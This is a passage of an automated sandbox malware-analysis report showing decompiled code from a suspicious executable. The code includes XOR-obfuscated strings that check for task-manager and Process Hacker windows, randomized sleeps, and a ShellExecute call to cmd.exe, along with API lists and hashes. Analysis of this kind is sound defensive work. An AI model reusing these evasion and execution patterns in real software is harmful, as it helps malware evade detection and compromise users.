										E0040EEFE(0x450d3c);
										_t440 = _t440 + 8;
									}
								}
								_t301 =  *0x450dd8; // 0x0
								if(_t301 != 0) {
									 *0x450dd4 =  *0x450dd4 ^ 0x0000002e;
									 *0x450dd5 =  *0x450dd5 ^ 0x0000002e;
									 *0x450dd6 =  *0x450dd6 ^ 0x0000002e;
									 *0x450dd7 =  *0x450dd7 ^ 0x0000002e;
									 *0x450dd8 = _t301 ^ 0x0000002e;
								}
								_t389 = 0x450dd4;
								_v472 = 0;
								_v456 = 0;
								_v452 = 0xf;
								_t119 =  &(_t389[1]); // 0x450dd5
								_t415 = _t119;
								do {
									_t302 =  *_t389;
									_t389 =  &(_t389[1]);
								} while (_t302 != 0);
								E004026B0(_t344,  &_v472, 0x450dd4, _t389 - _t415);
								_t425 = _v52;
								_t354 = _t425;
								_v40 = 7;
								_t304 = E0040CA60(_t425,  &_v472);
								if(_t304 != 0) {
									goto L47;
								} else {
									_v445 = _t304;
									L48:
									_t413 = _v452;
									if(_t413 < 0x10) {
										L52:
										_t402 = _v476;
										if(_t402 < 0x10) {
											L56:
											if(_v445 != 0) {
												goto L89;
											} else {
												_t374 = _v48 - _t425;
												_t402 = 0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2;
												_t257 = (0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2);
												_t492 = _t257 - 1;
												if(_t492 < 0) {
													goto L90;
												} else {
													if(_t492 == 0) {
														goto L91;
													} else {
														if(_t257 == 2) {
															_t279 = _t425;
															if( *((intOrPtr*)(_t425 + 0x14)) >= 0x10) {
																_t279 =  *_t425;
															}
															if( *((intOrPtr*)(_t425 + 0x10)) != 1) {
																L68:
																__eflags =  *((intOrPtr*)(_t425 + 0x14)) - 0x10;
																_t385 = _t425;
																if( *((intOrPtr*)(_t425 + 0x14)) >= 0x10) {
																	_t385 =  *_t425;
																}
																__eflags =  *((intOrPtr*)(_t425 + 0x10)) - 2;
																if(__eflags == 0) {
																	_t280 =  *_t385 & 0x000000ff;
																	__eflags = _t280 - 0x72;
																	if(_t280 != 0x72) {
																		L74:
																		asm("sbb eax, eax");
																		_t281 = _t280 | 0x00000001;
																		__eflags = _t281;
																	} else {
																		_t280 =  *(_t385 + 1) & 0x000000ff;
																		__eflags = _t280 - 0x73;
																		if(_t280 != 0x73) {
																			goto L74;
																		} else {
																			_t281 = 0;
																		}
																	}
																	__eflags = _t281;
																	if(__eflags == 0) {
																		_t282 = E00417DF6(_t385, __eflags);
																		asm("cdq");
																		_t411 = _t282 % 0xc350 + 0x11170;
																		__eflags = _t411;
																		goto L77;
																	}
																}
															} else {
																_t288 =  *_t279 & 0x000000ff;
																if(_t288 != 0x72) {
																	asm("sbb eax, eax");
																	_t289 = _t288 | 0x00000001;
																	__eflags = _t289;
																} else {
																	_t289 = 0;
																}
																_t497 = _t289;
																if(_t289 != 0) {
																	goto L68;
																} else {
																	_t290 = E00417DF6(_t374, _t497);
																	asm("cdq");
																	_t411 = _t290 % 0xc350 + 0x2710;
																	L77:
																	Sleep(_t411);
																	_t450 = _t440 - 0x18;
																	E0040BB90(_t344, _t450, _t411, _t420, _v52 + 0x18);
																	E00408D00(_t344, _t420, _t425, _v52 + 0x18);
																	_t440 = _t450 + 0x18;
																}
															}
														}
														_t409 = _v80;
														if(_t409 < 0x10) {
															L82:
															_t161 = _v268 + 4; // 0x43a364
															 *((intOrPtr*)(_t429 +  *_t161 - 0x100)) = 0x439cfc;
															_t165 = _v268 + 4; // 0x43a364
															_t166 =  *_t165 - 0x60; // 0x43a304
															 *((intOrPtr*)(_t429 +  *_t165 - 0x104)) = _t166;
															E0040A510( &_v252);
															_t171 = _v268 + 4; // 0x43a364
															 *((intOrPtr*)(_t429 +  *_t171 - 0x100)) = 0x439ca4;
															_t175 = _v268 + 4; // 0x33323130
															_t176 =  *_t175 - 0x18; // 0x33323118
															 *((intOrPtr*)(_t429 +  *_t175 - 0x104)) = _t176;
															_v16 = 0;
															_v172 = 0x439bdc;
															E0040E4D3( &_v172);
															_t442 = _t440 + 4;
															E0040B930( &_v52, _t420);
															_t270 = _v56;
															if(_t270 < 0x10) {
																L86:
																 *[fs:0x0] = _v24;
																_pop(_t421);
																_pop(_t426);
																return E0040EBBF(_t270, _t344, _v32 ^ _t429, _t409, _t421, _t426);
															} else {
																_t409 = _v76;
																_t185 = _t270 + 1; // 0x11
																_t383 = _t185;
																_t272 = _t409;
																if(_t383 < 0x1000) {
																	L85:
																	_push(_t383);
																	_t270 = E0040EDFF(_t409);
																	goto L86;
																} else {
																	_t402 =  *(_t409 - 4);
																	_t383 = _t383 + 0x23;
																	if(_t272 -  *(_t409 - 4) + 0xfffffffc > 0x1f) {
																		goto L92;
																	} else {
																		goto L85;
																	}
																}
															}
														} else {
															_t384 = _v100;
															_t409 = _t409 + 1;
															_t275 = _t384;
															if(_t409 < 0x1000) {
																L81:
																_push(_t409);
																E0040EDFF(_t384);
																_t440 = _t440 + 8;
																goto L82;
															} else {
																_t384 =  *(_t384 - 4);
																_t402 = _t409 + 0x23;
																if(_t275 - _t384 + 0xfffffffc > 0x1f) {
																	goto L92;
																} else {
																	goto L81;
																}
															}
														}
													}
												}
											}
										} else {
											_t354 = _v496;
											_t402 = _t402 + 1;
											_t292 = _t354;
											if(_t402 < 0x1000) {
												L55:
												_push(_t402);
												E0040EDFF(_t354);
												_t425 = _v52;
												_t440 = _t440 + 8;
												goto L56;
											} else {
												_t354 =  *(_t354 - 4);
												_t402 = _t402 + 0x23;
												if(_t292 - _t354 + 0xfffffffc > 0x1f) {
													goto L92;
												} else {
													goto L55;
												}
											}
										}
									} else {
										_t354 = _v472;
										_t414 = _t413 + 1;
										_t296 = _t354;
										if(_t414 < 0x1000) {
											L51:
											_push(_t414);
											E0040EDFF(_t354);
											_t425 = _v52;
											_t440 = _t440 + 8;
											goto L52;
										} else {
											_t354 =  *(_t354 - 4);
											_t402 = _t414 + 0x23;
											if(_t296 - _t354 + 0xfffffffc > 0x1f) {
												goto L92;
											} else {
												goto L51;
											}
										}
									}
								}
							}
						} else {
							_t392 =  *_t420;
							_t316 =  *0x450ef8; // 0x80000008
							_v40 = 0x7b7d6160;
							_v36 = 0x2e6c;
							if(_t316 >  *((intOrPtr*)( *_t420 + 4))) {
								E0040EF48(_t316, 0x450ef8);
								_t440 = _t440 + 4;
								_t468 =  *0x450ef8 - 0xffffffff;
								if( *0x450ef8 == 0xffffffff) {
									 *0x450d10 = _v40;
									 *0x450d14 = _v36;
									E0040F25B(_t392, _t468, E0042D510);
									E0040EEFE(0x450ef8);
									_t440 = _t440 + 8;
								}
							}
							_t317 =  *0x450d15; // 0x0
							if(_t317 != 0) {
								 *0x450d10 =  *0x450d10 ^ 0x0000002e;
								 *0x450d11 =  *0x450d11 ^ 0x0000002e;
								 *0x450d12 =  *0x450d12 ^ 0x0000002e;
								 *0x450d13 =  *0x450d13 ^ 0x0000002e;
								 *0x450d14 =  *0x450d14 ^ 0x0000002e;
								 *0x450d15 = _t317 ^ 0x0000002e;
							}
							_t393 = 0x450d10;
							_v472 = 0;
							_v456 = 0;
							_v452 = 0xf;
							_t89 =  &(_t393[1]); // 0x450d11
							_t417 = _t89;
							do {
								_t318 =  *_t393;
								_t393 =  &(_t393[1]);
							} while (_t318 != 0);
							_t369 =  &_v472;
							E004026B0(_t344,  &_v472, 0x450d10, _t393 - _t417);
							_t320 = _v48;
							if(_t320 == _v44) {
								_push( &_v472);
								_push(_t320);
								_t369 =  &_v52;
								E0040CE50(_t344,  &_v52, _t420, _t425);
								_t418 = _v452;
								__eflags = _t418 - 0x10;
								if(_t418 < 0x10) {
									goto L30;
								} else {
									_t369 = _v472;
									_t419 = _t418 + 1;
									_t322 = _t369;
									__eflags = _t419 - 0x1000;
									if(_t419 < 0x1000) {
										L29:
										_push(_t419);
										E0040EDFF(_t369);
										_t440 = _t440 + 8;
										goto L30;
									} else {
										_t369 =  *(_t369 - 4);
										_t402 = _t419 + 0x23;
										__eflags = _t322 - _t369 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L92;
										} else {
											goto L29;
										}
									}
								}
							} else {
								asm("movups xmm0, [ebp-0x1cc]");
								 *_t320 = 0;
								asm("movups [eax], xmm0");
								asm("movq xmm0, [ebp-0x1bc]");
								asm("movq [eax+0x10], xmm0");
								_v48 = _v48 + 0x18;
								goto L30;
							}
						}
					} else {
						if(_t425 < 0x1000) {
							_t336 = E0040EDCF(_t420, _t425, __eflags, _t425);
							_t454 = _t440 + 4;
							_t420 = _t336;
							L9:
							E004104C0(_t420, _v40, _t425);
							_t354 = _t425 + _t420;
							_v196 = _t354;
							_t440 = _t454 + 0xc;
							 *_v240 = _t420;
							 *_v224 = _t420;
							 *_v208 = _t425;
							_t218 = 3;
							goto L11;
						} else {
							_t41 = _t425 + 0x23; // 0x23
							_t341 = _t41;
							_t461 = _t341 - _t425;
							if(_t341 <= _t425) {
								L88:
								E004018B0();
								L89:
								_t221 = E004096D0( &_v444, _t354);
								_t441 = _t440 - 0xc;
								L93();
								E0040B4E0( &_v444, E00402510( &_v520, E0040B820(_t221)));
								E00402440(_t344,  &_v520);
								E00417CAD(0);
								L90:
								E004054C0(_t344, __eflags);
								L91:
								_t442 = _t441 - 0x18;
								_t425 = _t442;
								E0040BB90(_t344, _t442, _t402, _t420, E0040B910( &_v52, 0)); // executed
								E00409500(_t344, _t442, _t402, _t420, _t442); // executed
								goto L92;
							} else {
								_t342 = E0040EDCF(_t420, _t425, _t461, _t341);
								_t442 = _t440 + 4;
								if(_t342 == 0) {
									L92:
									E00413527(_t344, _t402, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t429);
									_t430 = _t442;
									_t232 =  *0x43d054; // 0x7bd02ead
									_v556 = _t232 ^ _t430;
									_push(_t344);
									_v564 = 0x5a5d4b5a;
									_t362 =  *( *[fs:0x2c]);
									_t235 =  *0x45100c;
									__eflags =  *0x45100c -  *((intOrPtr*)(_t362 + 4));
									if( *0x45100c >  *((intOrPtr*)(_t362 + 4))) {
										E0040EF48(_t235, 0x45100c);
										__eflags =  *0x45100c - 0xffffffff;
										if(__eflags == 0) {
											_t197 =  &_v28; // 0x5a5d4b5a
											 *0x450f48 =  *_t197;
											 *0x450f4c = 0x2e;
											E0040F25B(_t362, __eflags, 0x42d4c0);
											E0040EEFE(0x45100c);
										}
									}
									__eflags = _v20 ^ _t430;
									_pop(_t346);
									return E0040EBBF(0x450f48, _t346, _v20 ^ _t430, _t402, _t420, _t425);
								} else {
									_t42 = _t342 + 0x23; // 0x23
									_t420 = _t42 & 0xffffffe0;
									 *((intOrPtr*)(_t420 - 4)) = _t342;
									goto L9;
								}
							}
						}
					}
				}
			}

0x004096f0
0x004096f1
0x004096f9
0x00409700
0x00409704
0x00409706
0x00409708
0x00409713
0x00409714
0x0040971b
0x00409720
0x00409722
0x00409725
0x00409726
0x00409727
0x0040972b
0x00409731
0x00409736
0x00409746
0x0040974b
0x0040974d
0x00409754
0x00409757
0x0040975e
0x00409765
0x00409768
0x00409768
0x0040976a
0x0040976b
0x0040976b
0x00409776
0x00409786
0x00409790
0x00409797
0x0040979e
0x004097a3
0x004097a6
0x004097b6
0x004097c0
0x004097c3
0x004097d0
0x004097d8
0x004097df
0x004097e9
0x004097f3
0x004097fb
0x00409806
0x00409809
0x0040981a
0x0040981d
0x00409820
0x00409827
0x0040982d
0x00409839
0x0040983c
0x00409840
0x00409843
0x00409848
0x00409858
0x00409ee3
0x00000000
0x0040985e
0x00409860
0x004098d1
0x004098db
0x004098db
0x004098dc
0x004098df
0x004098eb
0x004098f2
0x004098f9
0x00409900
0x00409905
0x00409912
0x00409914
0x00409914
0x0040991a
0x0040991e
0x0040992d
0x0040992e
0x00409931
0x00409920
0x00409920
0x00409922
0x00409927
0x00409927
0x00409936
0x00409937
0x00409940
0x00409945
0x0040994d
0x00409914
0x0040995c
0x0040995f
0x00409972
0x00409abf
0x00409abf
0x00409ac1
0x00409ac6
0x00409ad3
0x00409ada
0x00409adf
0x00409ae2
0x00409ae9
0x00409af3
0x00409af8
0x00409b05
0x00409b0a
0x00409b0a
0x00409ae9
0x00409b0d
0x00409b14
0x00409b16
0x00409b1d
0x00409b24
0x00409b2d
0x00409b2d
0x00409b32
0x00409b37
0x00409b41
0x00409b4b
0x00409b55
0x00409b55
0x00409b58
0x00409b58
0x00409b5a
0x00409b5b
0x00409b6d
0x00409b72
0x00409b7b
0x00409b7d
0x00409b8b
0x00409c7e
0x00409c7e
0x00409c82
0x00409c89
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b91
0x00409b91
0x00409b96
0x00409b9d
0x00409baa
0x00409bb1
0x00409bb6
0x00409bb9
0x00409bc0
0x00409bc5
0x00409bd5
0x00409bda
0x00409be7
0x00409bec
0x00409bec
0x00409bc0
0x00409bef
0x00409bf6
0x00409bf8
0x00409bff
0x00409c06
0x00409c0d
0x00409c16
0x00409c16
0x00409c1b
0x00409c20
0x00409c2a
0x00409c34
0x00409c3e
0x00409c3e
0x00409c41
0x00409c41
0x00409c43
0x00409c44
0x00409c56
0x00409c5b
0x00409c64
0x00409c66
0x00409c6d
0x00409c74
0x00000000
0x00409c76
0x00409c76
0x00409c8b
0x00409c8b
0x00409c94
0x00409cc8
0x00409cc8
0x00409cd1
0x00409d05
0x00409d0c
0x00000000
0x00409d12
0x00409d1a
0x00409d1e
0x00409d26
0x00409d28
0x00409d2b
0x00000000
0x00409d31
0x00409d31
0x00000000
0x00409d37
0x00409d3a
0x00409d44
0x00409d46
0x00409d48
0x00409d48
0x00409d4e
0x00409d79
0x00409d79
0x00409d7d
0x00409d7f
0x00409d81
0x00409d81
0x00409d83
0x00409d87
0x00409d89
0x00409d8c
0x00409d8e
0x00409d9c
0x00409d9c
0x00409d9e
0x00409d9e
0x00409d90
0x00409d90
0x00409d94
0x00409d96
0x00000000
0x00409d98
0x00409d98
0x00409d98
0x00409d96
0x00409da1
0x00409da3
0x00409da5
0x00409daa
0x00409db2
0x00409db2
0x00000000
0x00409db2
0x00409da3
0x00409d50
0x00409d50
0x00409d55
0x00409d5b
0x00409d5d
0x00409d5d
0x00409d57
0x00409d57
0x00409d57
0x00409d60
0x00409d62
0x00000000
0x00409d64
0x00409d64
0x00409d69
0x00409d71
0x00409db8
0x00409db9
0x00409dc2
0x00409dcb
0x00409dd0
0x00409dd5
0x00409dd5
0x00409d62
0x00409d4e
0x00409dd8
0x00409dde
0x00409e0c
0x00409e12
0x00409e15
0x00409e26
0x00409e29
0x00409e2c
0x00409e39
0x00409e44
0x00409e47
0x00409e58
0x00409e5b
0x00409e5e
0x00409e6b
0x00409e73
0x00409e7d
0x00409e82
0x00409e88
0x00409e8d
0x00409e93
0x00409ec3
0x00409ec6
0x00409ece
0x00409ecf
0x00409ee0
0x00409e95
0x00409e95
0x00409e98
0x00409e98
0x00409e9b
0x00409ea3
0x00409eb9
0x00409eb9
0x00409ebb
0x00000000
0x00409ea5
0x00409ea5
0x00409ea8
0x00409eb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00409eb3
0x00409ea3
0x00409de0
0x00409de0
0x00409de3
0x00409de4
0x00409dec
0x00409e02
0x00409e02
0x00409e04
0x00409e09
0x00000000
0x00409dee
0x00409dee
0x00409df1
0x00409dfc
0x00000000
0x00000000
0x00000000
0x00000000
0x00409dfc
0x00409dec
0x00409dde
0x00409d31
0x00409d2b
0x00409cd3
0x00409cd3
0x00409cd9
0x00409cda
0x00409ce2
0x00409cf8
0x00409cf8
0x00409cfa
0x00409cff
0x00409d02
0x00000000
0x00409ce4
0x00409ce4
0x00409ce7
0x00409cf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00409cf2
0x00409ce2
0x00409c96
0x00409c96
0x00409c9c
0x00409c9d
0x00409ca5
0x00409cbb
0x00409cbb
0x00409cbd
0x00409cc2
0x00409cc5
0x00000000
0x00409ca7
0x00409ca7
0x00409caa
0x00409cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00409cb5
0x00409ca5
0x00409c94
0x00409c74
0x00409978
0x00409978
0x0040997a
0x0040997f
0x00409986
0x00409992
0x00409999
0x0040999e
0x004099a1
0x004099a8
0x004099ad
0x004099bb
0x004099c1
0x004099ce
0x004099d3
0x004099d3
0x004099a8
0x004099d6
0x004099dd
0x004099df
0x004099e6
0x004099ed
0x004099f4
0x004099fb
0x00409a04
0x00409a04
0x00409a09
0x00409a0e
0x00409a18
0x00409a22
0x00409a2c
0x00409a2c
0x00409a30
0x00409a30
0x00409a32
0x00409a33
0x00409a3f
0x00409a45
0x00409a4a
0x00409a50
0x00409a7b
0x00409a7c
0x00409a7d
0x00409a80
0x00409a85
0x00409a8b
0x00409a8e
0x00000000
0x00409a90
0x00409a90
0x00409a96
0x00409a97
0x00409a99
0x00409a9f
0x00409ab5
0x00409ab5
0x00409ab7
0x00409abc
0x00000000
0x00409aa1
0x00409aa1
0x00409aa4
0x00409aac
0x00409aaf
0x00000000
0x00000000
0x00000000
0x00000000
0x00409aaf
0x00409a9f
0x00409a52
0x00409a52
0x00409a59
0x00409a5f
0x00409a62
0x00409a6a
0x00409a6f
0x00000000
0x00409a6f
0x00409a50
0x00409862
0x00409868
0x00409892
0x00409897
0x0040989a
0x0040989c
0x004098a1
0x004098ac
0x004098af
0x004098b5
0x004098b8
0x004098c0
0x004098c8
0x004098ca
0x00000000
0x0040986a
0x0040986a
0x0040986a
0x0040986d
0x0040986f
0x00409ee8
0x00409ee8
0x00409eed
0x00409ef4
0x00409ef9
0x00409efc
0x00409f1b
0x00409f26
0x00409f2d
0x00409f32
0x00409f32
0x00409f37
0x00409f37
0x00409f3d
0x00409f49
0x00409f4e
0x00000000
0x00409875
0x00409876
0x0040987b
0x00409880
0x00409f53
0x00409f53
0x00409f58
0x00409f59
0x00409f5a
0x00409f5b
0x00409f5c
0x00409f5d
0x00409f5e
0x00409f5f
0x00409f60
0x00409f61
0x00409f66
0x00409f6d
0x00409f76
0x00409f77
0x00409f80
0x00409f82
0x00409f87
0x00409f8d
0x00409f94
0x00409f9c
0x00409fa3
0x00409fa5
0x00409fad
0x00409fb2
0x00409fb8
0x00409fc2
0x00409fc7
0x00409fa3
0x00409fd2
0x00409fd4
0x00409fdd
0x00409886
0x00409886
0x00409889
0x0040988c
0x00000000
0x0040988c
0x00409880
0x0040986f
0x00409868
0x00409860

APIs

Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7

__Init_thread_footer.LIBCMT ref: 004099CE
__Init_thread_footer.LIBCMT ref: 00409B05
__Init_thread_footer.LIBCMT ref: 00409BE7
Sleep.KERNEL32(?,00450F1C,00450F1D,?,?,?), ref: 00409DB9
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409E7D
Concurrency::cancel_current_task.LIBCPMT ref: 00409EE3
Concurrency::cancel_current_task.LIBCPMT ref: 00409EE8

Part of subcall function 004018B0: ___std_exception_copy.LIBVCRUNTIME ref: 004018EE

Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32(7BD02EAD), ref: 004054EC
Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32 ref: 00405508
Part of subcall function 004054C0: ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Part of subcall function 00409500: CreateThread.KERNEL32 ref: 004095FE
Part of subcall function 00409500: Sleep.KERNEL32(00000BB8), ref: 00409609

__Init_thread_footer.LIBCMT ref: 00409FC2

Strings

ZK]Z, xrefs: 00409FA5
MFE., xrefs: 00409AC6
D@, xrefs: 00409E73

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcessSleepTime$CreateExecuteFileIos_base_dtorShellSystemThreadUnothrow_t@std@@@___std_exception_copy__ehfuncinfo$??2@std::ios_base::_
String ID: D@$MFE.$ZK]Z
API String ID: 3757312541-2629744079
Opcode ID: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
Instruction ID: 09b12323e8cf1ccab507edc46462649b34e9962f34bdcbd7157f6d7b385d370e
Opcode Fuzzy Hash: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
Instruction Fuzzy Hash: B232E0759002488BDB24DF68D845BEEB7B0AF45308F1441BAE805773D3D779AE88CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405F40 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 389
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00405F40(void* __ebx, void* __edi) {
				long _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				void _v88;
				struct _SID_IDENTIFIER_AUTHORITY _v96;
				long _v100;
				void* _v104;
				void* _v108;
				char _v276;
				void* _v280;
				int _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v305;
				long _v312;
				long _v316;
				long _v332;
				long* _v336;
				long _v340;
				long _v356;
				signed int _v380;
				short _v460;
				long _v464;
				void* _v472;
				void* __esi;
				void* __ebp;
				signed int _t98;
				signed int _t99;
				intOrPtr _t102;
				signed char _t103;
				signed char _t104;
				void* _t106;
				int _t107;
				intOrPtr _t109;
				signed char _t110;
				signed char _t111;
				void* _t113;
				intOrPtr _t114;
				signed char _t115;
				signed char _t116;
				void* _t118;
				struct HWND__* _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				void* _t127;
				long _t128;
				signed int _t133;
				signed int _t137;
				signed int _t142;
				signed int _t146;
				int _t147;
				long _t152;
				intOrPtr _t156;
				signed char _t157;
				signed char _t158;
				void* _t163;
				void* _t169;
				void* _t191;
				signed int _t193;
				signed char* _t194;
				signed char* _t201;
				signed char* _t204;
				intOrPtr* _t208;
				long _t211;
				long _t216;
				signed char* _t217;
				long* _t222;
				signed char* _t224;
				void* _t225;
				signed char* _t226;
				signed char* _t227;
				intOrPtr _t229;
				void* _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				void* _t236;
				long* _t237;
				long* _t238;
				long* _t239;
				long* _t240;
				long* _t241;
				long* _t242;
				signed int _t243;

				_t190 = __ebx;
				_push(0xffffffff);
				_push(E0042C707);
				_push( *[fs:0x0]);
				_t236 = _t235 - 0x154;
				_t98 =  *0x43d054; // 0x7bd02ead
				_t99 = _t98 ^ _t233;
				_v20 = _t99;
				_push(__ebx);
				_push(__edi);
				_push(_t99);
				 *[fs:0x0] =  &_v16;
				_v284 = 0;
				_v288 = 0x455d4f5a;
				_v284 = 0x2e5c4943;
				_t229 =  *((intOrPtr*)( *[fs:0x2c]));
				_t102 =  *0x450ee8; // 0x80000010
				if(_t102 >  *((intOrPtr*)(_t229 + 4))) {
					E0040EF48(_t102, 0x450ee8);
					_t236 = _t236 + 4;
					_t252 =  *0x450ee8 - 0xffffffff;
					if( *0x450ee8 == 0xffffffff) {
						_t7 =  &_v288; // 0x455d4f5a
						_t8 =  &_v284; // 0x2e5c4943
						 *0x450d40 =  *_t7;
						 *0x450d44 =  *_t8;
						E0040F25B( *_t8, _t252, E0042CFC0);
						E0040EEFE(0x450ee8);
						_t236 = _t236 + 8;
					}
				}
				_t103 =  *0x450d47; // 0x0
				if(_t103 != 0) {
					 *0x450d40 =  *0x450d40 ^ 0x0000002e;
					 *0x450d41 =  *0x450d41 ^ 0x0000002e;
					 *0x450d42 =  *0x450d42 ^ 0x0000002e;
					 *0x450d43 =  *0x450d43 ^ 0x0000002e;
					 *0x450d44 =  *0x450d44 ^ 0x0000002e;
					 *0x450d45 =  *0x450d45 ^ 0x0000002e;
					 *0x450d46 =  *0x450d46 ^ 0x0000002e;
					 *0x450d47 = _t103 ^ 0x0000002e;
				}
				_t237 = _t236 - 0x18;
				_t194 = 0x450d40;
				_t222 = _t237;
				_t9 =  &(_t194[1]); // 0x450d41
				_t224 = _t9;
				 *_t222 = 0;
				_t222[4] = 0;
				_t222[5] = 0xf;
				asm("o16 nop [eax+eax]");
				do {
					_t104 =  *_t194;
					_t194 =  &(_t194[1]);
				} while (_t104 != 0);
				E004026B0(_t190, _t222, 0x450d40, _t194 - _t224); // executed
				_t106 = E00405350(_t190); // executed
				_t238 =  &(_t237[6]);
				if(_t106 != 0) {
					L56:
					_t107 = 1;
					goto L57;
				} else {
					_t109 =  *0x450fbc; // 0x80000011
					_v288 = 0x455d4f7a;
					_v284 = 0x2e5c4943;
					if(_t109 >  *((intOrPtr*)(_t229 + 4))) {
						E0040EF48(_t109, 0x450fbc);
						_t238 =  &(_t238[1]);
						_t258 =  *0x450fbc - 0xffffffff;
						if( *0x450fbc == 0xffffffff) {
							_t15 =  &_v288; // 0x455d4f7a
							_t16 =  &_v284; // 0x2e5c4943
							 *0x450f90 =  *_t15;
							 *0x450f94 =  *_t16;
							E0040F25B( *_t16, _t258, E0042CFB0);
							E0040EEFE(0x450fbc);
							_t238 =  &(_t238[2]);
						}
					}
					_t110 =  *0x450f97; // 0x0
					if(_t110 != 0) {
						 *0x450f90 =  *0x450f90 ^ 0x0000002e;
						 *0x450f91 =  *0x450f91 ^ 0x0000002e;
						 *0x450f92 =  *0x450f92 ^ 0x0000002e;
						 *0x450f93 =  *0x450f93 ^ 0x0000002e;
						 *0x450f94 =  *0x450f94 ^ 0x0000002e;
						 *0x450f95 =  *0x450f95 ^ 0x0000002e;
						 *0x450f96 =  *0x450f96 ^ 0x0000002e;
						 *0x450f97 = _t110 ^ 0x0000002e;
					}
					_t239 = _t238 - 0x18;
					_t201 = 0x450f90;
					_t222 = _t239;
					_t17 =  &(_t201[1]); // 0x450f91
					_t226 = _t17;
					 *_t222 = 0;
					_t222[4] = 0;
					_t222[5] = 0xf;
					do {
						_t111 =  *_t201;
						_t201 =  &(_t201[1]);
					} while (_t111 != 0);
					_t203 = _t222;
					E004026B0(_t190, _t222, 0x450f90, _t201 - _t226); // executed
					_t113 = E00405350(_t190); // executed
					_t240 =  &(_t239[6]);
					if(_t113 != 0) {
						goto L56;
					} else {
						_t114 =  *0x450f9c; // 0x80000012
						_v288 = 0x4b5c4759;
						_v284 = 0x5c4f465d;
						_v280 = 0x2e45;
						if(_t114 >  *((intOrPtr*)(_t229 + 4))) {
							E0040EF48(_t114, 0x450f9c);
							_t240 =  &(_t240[1]);
							_t264 =  *0x450f9c - 0xffffffff;
							if( *0x450f9c == 0xffffffff) {
								asm("movq xmm0, [ebp-0x11c]");
								asm("movq [0x450d8c], xmm0");
								 *0x450d94 = _v280;
								E0040F25B(_t203, _t264, E0042CF90);
								E0040EEFE(0x450f9c);
								_t240 =  &(_t240[2]);
							}
						}
						_t115 =  *0x450d95; // 0x0
						if(_t115 != 0) {
							 *0x450d8c =  *0x450d8c ^ 0x0000002e;
							 *0x450d8d =  *0x450d8d ^ 0x0000002e;
							 *0x450d8e =  *0x450d8e ^ 0x0000002e;
							 *0x450d8f =  *0x450d8f ^ 0x0000002e;
							 *0x450d90 =  *0x450d90 ^ 0x0000002e;
							 *0x450d91 =  *0x450d91 ^ 0x0000002e;
							 *0x450d92 =  *0x450d92 ^ 0x0000002e;
							 *0x450d93 =  *0x450d93 ^ 0x0000002e;
							 *0x450d94 =  *0x450d94 ^ 0x0000002e;
							 *0x450d95 = _t115 ^ 0x0000002e;
						}
						_t241 = _t240 - 0x18;
						_t204 = 0x450d8c;
						_t222 = _t241;
						_t25 =  &(_t204[1]); // 0x450d8d
						_t227 = _t25;
						 *_t222 = 0;
						_t222[4] = 0;
						_t222[5] = 0xf;
						do {
							_t116 =  *_t204;
							_t204 =  &(_t204[1]);
						} while (_t116 != 0);
						E004026B0(_t190, _t222, 0x450d8c, _t204 - _t227); // executed
						_t118 = E00405350(_t190); // executed
						_t242 =  &(_t241[6]);
						if(_t118 != 0) {
							goto L56;
						} else {
							_t119 = GetForegroundWindow(); // executed
							if(_t119 == 0) {
								L55:
								_t107 = 0;
								goto L57;
							} else {
								GetWindowTextA(_t119,  &_v276, 0x100);
								_t121 =  *0x450fb8; // 0x80000013
								_v304 = 0x4d415c7e;
								_v300 = 0xe5d5d4b;
								_v296 = 0x454d4f66;
								_v292 = 0x5c4b;
								if(_t121 >  *((intOrPtr*)(_t229 + 4))) {
									E0040EF48(_t121, 0x450fb8);
									_t242 =  &(_t242[1]);
									_t271 =  *0x450fb8 - 0xffffffff;
									if( *0x450fb8 == 0xffffffff) {
										_t34 =  &_v296; // 0x454d4f66
										asm("movq xmm0, [ebp-0x12c]");
										 *0x450f6c =  *_t34;
										_t35 =  &_v292; // 0x5c4b
										asm("movq [0x450f64], xmm0");
										 *0x450f70 =  *_t35;
										 *0x450f72 = 0x2e;
										E0040F25B( &_v276, _t271, E0042CF60);
										E0040EEFE(0x450fb8);
										_t242 =  &(_t242[2]);
									}
								}
								if( *0x450f72 != 0) {
									_t169 = 0;
									do {
										 *(_t169 + 0x450f64) =  *(_t169 + 0x450f64) ^ 0x0000002e;
										_t169 = _t169 + 1;
									} while (_t169 < 0xf);
								}
								_t208 = 0x450f64;
								_v356 = 0;
								_v340 = 0;
